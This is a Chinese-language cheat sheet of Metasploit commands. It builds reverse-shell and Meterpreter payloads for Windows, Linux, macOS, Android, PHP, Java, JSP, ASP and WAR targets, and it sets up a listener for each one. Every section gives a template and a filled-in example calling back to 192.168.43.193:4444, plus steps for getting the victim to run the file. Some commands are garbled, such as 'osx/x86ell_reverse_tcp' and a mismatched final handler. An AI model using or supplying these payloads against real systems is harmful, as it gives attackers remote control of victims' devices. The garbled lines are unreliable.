msfvenom -p windows/meterpreter/reverse_tcp LHOST=监听端ip地址 LPORT=监听端端口 x >文件路径/文件名
案例:msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.43.193 LPORT=4444 x >/shell.exe
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.43.193
set LPORT 4444
exploit
msfvenom -p linux/x86/shell_reverse_tcp LHOST=监听端ip地址 LPORT=监听端端口 x >文件路径/文件名
案例:msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.43.193 LPORT=4444 x >/linux_shell
需要给执行权限 chmod +x linux_shell
msfconsole
use exploit/multi/handler
set payload linux/x86/shell_reverse_tcp
set LHOST 192.168.43.193
set LPORT 4444
exploit
msfvenom -p osx/x86ell_reverse_tcp LHOST=监听端ip地址 LPORT=监听端端口 -f macho > 文件路径/文件名
案例:msfvenom -p osx/x86ell_reverse_tcp LHOST=192.168.43.193 LPORT=4444 -f macho > shell.macho
msfconsole
use exploit/multi/handler
set payload osx/x86ell_reverse_tcp
set LHOST 192.168.43.193
set LPORT 4444
exploit
msfvenom -p android/meterpreter/reverse_tcp LHOST=监听端ip地址 LPORT=监听端端口 R > 文件路径/文件名
案例:msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.43.193 LPORT=4444 R > shell.apk
手机安装apk文件点击执行
msfconsole
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST 192.168.43.193
set LPORT 4444
exploit
msfvenom -p php/meterpreter/reverse_tcp LHOST=监听端ip地址 LPORT=监听端端口 x>文件路径/文件名
案例:msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.43.193 LPORT=4444 x> shell.php
msfconsole
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set LHOST 192.168.43.193
set LPORT 4444
exploit
msfvenom -p java/meterpreter/reverse_tcp LHOST=监听端ip地址 LPORT=监听端端口 x >文件路径/文件名
案例:msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.43.193 LPORT=4444 x >shell.jar
运行命令:java -jar shell.jar
msfconsole
use exploit/multi/handler
set payload java/meterpreter/reverse_tcp
set LHOST 192.168.43.193
set LPORT 4444
exploit
msfvenom -p java/jsp_shell_reverse_tcp LHOST=监听端ip地址 LPORT=监听端端口 -f raw >文件路径/文件名
案例:msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.43.193 LPORT=4444 -f raw > shell.jsp
msfconsole
use exploit/multi/handler
set payload java/jsp_shell_reverse_tcp
set LHOST 192.168.43.193
set LPORT 4444
exploit
msfvenom -p windows/meterpreter/reverse_tcp LHOST=监听端ip地址 LPORT=监听端端口 -f asp > 文件路径/文件名
案例:msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.43.193 LPORT=4444 -f asp > shell.asp
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.43.193
set LPORT 4444
exploit
msfvenom -p java/jsp_shell_reverse_tcp LHOST=监听端ip地址 LPORT=监听端端口 -f war > shell.war
Scripting Payloads
案例:msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.43.193 LPORT=4444 -f war > shell.war
Scripting Payloads
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.43.193
set LPORT 4444
exploit